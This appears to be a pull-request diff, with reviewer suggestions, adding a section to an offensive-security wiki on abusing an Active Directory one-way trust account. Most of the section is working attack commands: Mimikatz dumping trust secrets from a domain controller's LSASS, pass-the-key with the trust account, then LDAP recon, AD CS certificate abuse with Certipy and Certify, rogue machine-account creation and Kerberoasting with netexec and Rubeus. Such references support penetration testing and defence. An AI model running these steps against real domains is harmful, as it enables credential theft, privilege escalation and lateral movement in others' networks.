Docs/adtrusts: add a new One-Way Trust account abuse section (#266)
ShutdownRepo/The-Hacker-Recipes: docs/src/ad/movement/trusts/index.md

```

The tool returns the trust account password in cleartext, as an NT hash, and as Kerberos AES-256/AES-128 keys.

== Windows

From a domain controller, [Mimikatz](https://github.com/gentilkiwi/mimikatz) can be used to dump the trust secrets from LSASS. This requires local execution on the DC with administrative privileges.

```powershell
# On the trusting DC
mimikatz.exe "lsadump::trust /patch" "exit"
```

The output includes the inter-realm keys for each trust relationship, identified by the `[In]` and `[Out]` sections:

```
* aes256_hmac       <AES256_KEY>
* aes128_hmac       <AES128_KEY>
* rc4_hmac_nt       <NT_HASH>
```

> [!NOTE]
> The AES keys shown are inter-realm trust derivations and cannot be used to request a TGT for the trust account. Only the `rc4_hmac_nt` value (the trust account NT hash) is usable in the next step.

:::

#### 2. Authenticate to the trusted domain

A TDO account cannot use NTLM authentication, only Kerberos. Consequently, once the Kerberos keys for the trust account are obtained, they can be used to authenticate to the trusted domain. The inter-realm keys are not particularly useful here since the attacker already controls the trusting domain.

> The trust account name is the NetBIOS name of the trusting domain followed by `$`. Following the intro example, the trust account created in domain A for the trusting domain B is `DOMAIN_B$`. A TGT for this account must be requested on the trusted domain using the credentials obtained in the previous step. The [Pass-the-Key](../kerberos/ptk) technique applies here, using either the NT hash (RC4) or, when available from `tdo_dump`, the AES-256 key (preferred, avoids RC4 downgrade detection).

Reviewer: ```suggestion
Once the trust account's Kerberos keys are obtained, they can be used to authenticate to the trusted domain. It's worth noting the trust account can't authenticate with NTLM. The inter-realm keys are not particularly useful in this context since the attacker already controls the trusting domain.

The trust account name is the NetBIOS name of the trusting domain followed by `$`. Following the intro example, the trust account created in domain A for the trusting domain B would be `DOMAIN_B$`. A TGT for this account must be requested on the trusted domain using the credentials obtained in the previous step.
```

# With ldeep
ldeep ldap -u "$TRUSTING_ACCOUNT" -d "$TARGET_DOMAIN" -s ldap://"$TARGET_DOMAIN" -k search "(sAMAccountName=administrator)"

# --- AD CS Exploitation ---
# Request a certificate as the trust account
certipy req -u "$TRUSTING_ACCOUNT"@"$TARGET_DOMAIN" -k -no-pass -target "$TARGET_FQDN" -dc-ip "$TARGET" -ca "$CA_NAME"

# Authenticate with the obtained certificate
certipy auth -pfx "$TRUSTING_ACCOUNT.pfx" -dc-ip "$TARGET" -ldap-shell

# --- Computer account creation ---
addcomputer.py "$TARGET_DOMAIN"/"$TRUSTING_ACCOUNT" -k -no-pass -dc-host "$TARGET_FQDN" -computer-name "$ATTACKCOMPUTER"

# --- Kerberoasting ---
netexec ldap "$TARGET_FQDN" --use-kcache --kerberoasting kerberoasting.txt
```

== Windows

```powershell
# --- LDAP Recon ---
Get-ADUser Administrator -Server "$TARGET_DOMAIN" -Properties *

# --- AD CS Exploitation ---
Certify.exe request /ca:"$TARGET_FQDN\$CA_NAME"

# --- Computer account creation ---
Import-Module PowerMad.ps1
New-MachineAccount -MachineAccount "$ATTACKCOMPUTER" -Domain "$TARGET_DOMAIN" -DomainController "$TARGET_FQDN"

# --- Kerberoasting ---
Rubeus.exe kerberoast /domain:"$TARGET_DOMAIN"

> ```

Reviewer: ```suggestion
The resulting TGT can then be used for various authenticated recon and attacks against the trusted domain.
```
